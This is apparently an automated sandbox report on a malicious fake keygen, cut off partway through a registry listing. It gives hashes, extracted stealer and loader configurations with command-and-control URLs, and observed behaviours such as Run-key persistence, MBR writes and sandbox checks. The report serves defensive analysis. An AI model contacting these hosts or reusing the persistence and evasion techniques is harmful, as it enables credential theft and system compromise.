Analysis
-
max time kernel
144s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
13-02-2021 10:45
Static task
static1
Behavioral task
behavioral1
Sample
Palo_Alto_Business_Plan_Pro_serial_key_gen.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Palo_Alto_Business_Plan_Pro_serial_key_gen.exe
Resource
win10v20201028
General
-
Target
Palo_Alto_Business_Plan_Pro_serial_key_gen.exe
-
Size
9.0MB
-
MD5
efb9f6994cbacf25a09260a6dea2e097
-
SHA1
28dce13f68b89a4402a557a336c280400129999b
-
SHA256
9a2895ec90f431962ab8ad4ae4f6808049f7ca629d92c61fb200e788d096c7dd
-
SHA512
c8b2f89f162896cc9ba50daed06fbb92e4e84f73aa6a85da185e342fb096f535594e791488ac8595cfdf474418b59f1ba9507ff536059cdee0b0ce0288da3b0e
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
smokeloader
2020
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
http://4zavr.com/upload/
http://zynds.com/upload/
http://atvua.com/upload/
http://detse.net/upload/
http://dsdett.com/upload/
http://dtabasee.com/upload/
http://yeronogles.monster/upload/
Extracted
raccoon
17694a35d42ac97e2cd3ebd196db01b372cce1b0
-
url4cnc
https://telete.in/o23felk0s
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral2/memory/2128-163-0x00000000022F0000-0x000000000231E000-memory.dmp family_redline behavioral2/memory/2128-173-0x0000000004A50000-0x0000000004A7C000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Nirsoft 6 IoCs
resource yara_rule behavioral2/files/0x000200000001ab78-58.dat Nirsoft behavioral2/files/0x000200000001ab78-59.dat Nirsoft behavioral2/files/0x000500000001ab7c-67.dat Nirsoft behavioral2/files/0x000500000001ab7c-68.dat Nirsoft behavioral2/files/0x000600000001ab7c-76.dat Nirsoft behavioral2/files/0x000600000001ab7c-77.dat Nirsoft -
Creates new service(s) 1 TTPs
-
Executes dropped EXE 28 IoCs
pid Process 1864 keygen-pr.exe 3688 keygen-step-1.exe 3776 keygen-step-3.exe 1340 keygen-step-4.exe 3140 key.exe 636 Setup.exe 3528 6489A2274AE24900.exe 3956 6489A2274AE24900.exe 3440 md2_2efs.exe 3996 1613216621223.exe 3884 1613216625786.exe 932 1613216631442.exe 1216 ThunderFW.exe 1128 MiniThunderPlatform.exe 3392 23E04C4F32EF2158.exe 2504 23E04C4F32EF2158.tmp 2712 seed.sfx.exe 2280 seed.exe 4984 8132.exe 5004 83A4.exe 5088 8887.exe 396 8132.exe 2128 90E5.exe 4828 955A.exe 4816 updatewin1.exe 5016 updatewin2.exe 2664 9BE3.exe 5036 updatewin.exe -
Modifies Windows Firewall 1 TTPs
-
resource yara_rule behavioral2/files/0x0006000000015612-30.dat office_xlm_macros -
resource yara_rule behavioral2/files/0x000300000001abc6-120.dat upx behavioral2/files/0x000300000001abc6-121.dat upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation cmd.exe -
Loads dropped DLL 11 IoCs
pid Process 3828 MsiExec.exe 3528 6489A2274AE24900.exe 3528 6489A2274AE24900.exe 1128 MiniThunderPlatform.exe 1128 MiniThunderPlatform.exe 1128 MiniThunderPlatform.exe 1128 MiniThunderPlatform.exe 1128 MiniThunderPlatform.exe 1128 MiniThunderPlatform.exe 1128 MiniThunderPlatform.exe 2280 seed.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 2196 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\b1facd0d-4dd5-495c-8d07-6e6f4f4b88c6\\8132.exe\" --AutoStart" 8132.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 100 api.2ip.ua 101 api.2ip.ua 118 api.2ip.ua -
Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Setup.exe File opened for modification \??\PhysicalDrive0 6489A2274AE24900.exe File opened for modification \??\PhysicalDrive0 6489A2274AE24900.exe File opened for modification \??\PhysicalDrive0 MiniThunderPlatform.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 636 Setup.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 3528 set thread context of 3972 3528 6489A2274AE24900.exe 102 PID 3528 set thread context of 2164 3528 6489A2274AE24900.exe 111 PID 3528 set thread context of 2504 3528 6489A2274AE24900.exe 113 -
Drops file in Program Files directory 48 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Seed Trade\Seed\seed.exe seed.sfx.exe File opened for modification C:\Program Files (x86)\HappyNewYear\seed.sfx.exe 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-TEPD7.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-QF6G3.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-GM58I.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\lang\is-NQK1S.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-GLJNN.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-MQ76D.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-V44H4.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\lang\is-TOOE2.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-6IN36.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\Seed Trade\Seed\__tmp_rar_sfx_access_check_259402000 seed.sfx.exe File opened for modification C:\Program Files (x86)\HappyNewYear\DreamTrip.exe 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-D4Q3A.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-N5TAG.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-PQFEM.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-R2R5L.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-B1B2H.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-H3KK9.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-9FCV1.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-JOJOF.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-954H1.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-81PI1.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-V97CT.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-OAPHL.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\Seed Trade seed.sfx.exe File opened for modification C:\Program Files (x86)\HappyNewYear\unins000.dat 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\Seed Trade\Seed\seed.exe seed.sfx.exe File created C:\Program Files (x86)\HappyNewYear\is-9KCP2.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-0GM8A.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-EACC1.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-TSCK9.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-FGQ42.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-2B979.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-PD4MI.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-1G59G.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\unins000.dat 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-TD80O.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-D67BV.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-V5J69.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-C5P72.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-RQR66.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\Seed Trade\Seed seed.sfx.exe File created C:\Program Files (x86)\HappyNewYear\is-EF55D.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-9C3DT.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-NMO6S.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-G4VTD.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-930S5.tmp 23E04C4F32EF2158.tmp -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 1 IoCs
pid pid_target Process procid_target 1836 3440 WerFault.exe 97 -
Checks SCSI registry key(s) 3 TTPs 15 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc 6489A2274AE24900.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc 6489A2274AE24900.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 6489A2274AE24900.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName 6489A2274AE24900.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName 6489A2274AE24900.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5184 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 2920 taskkill.exe -
Modifies Control Panel 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\Colors MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000e7cf4eca0f8b28001db4c665f821dab7df18862f3080bf5a2c668b4e72602f4e746eeccba050c973328524138553603cb0a3b4007e8066b82286d9fda9a0003800cd853378d30b9f281d10ecce2a971b063fd2bb734d9db7cc3e40b98e154ef91d8dc0b2e332cafc901edcd250c6e7b0d38b16494a078db5e530532714e0ef68874e42622e8fd4613929ae131847ed977b29899c52ce507ea4fbdfef3b1f5a6baeb0800cf808a01bdadc8849d6cc4ad310b881461fc21395863f79e3e0f30376e0531d8913bf5ae23ed95201ce77e8408ad7a6182403534fb09cb6b1dd7c8875ced7d52684d2ef9833bedf013567755c322860d56ab1e2b885b2d43034dbaff427ddec254e630cdcd92cba564cbc50566b4a2cf448ec2751422147310b2ec9996103db42bf90a76626c4ea086396d376aedce77509d4dd8f3489a8e6a79678f448ea3d50637b973cda24258ca9146cd30880c1c2d689e23f4f8af1de7f34bd97b9329be2a9428cb05cee3fc0eb58ff5176d5d2a0ef2ba8a557c4a3842626618ab47b500a1b07ec311ac0ea7b258102feb97a82349cda697b5cb3ce03dfea07c8d70e0e39c58c MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = c84a4997fd01d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "y1y7scc" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{7A2FF968-FCB2-4C8E-A406-464F5CB748DD} = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local 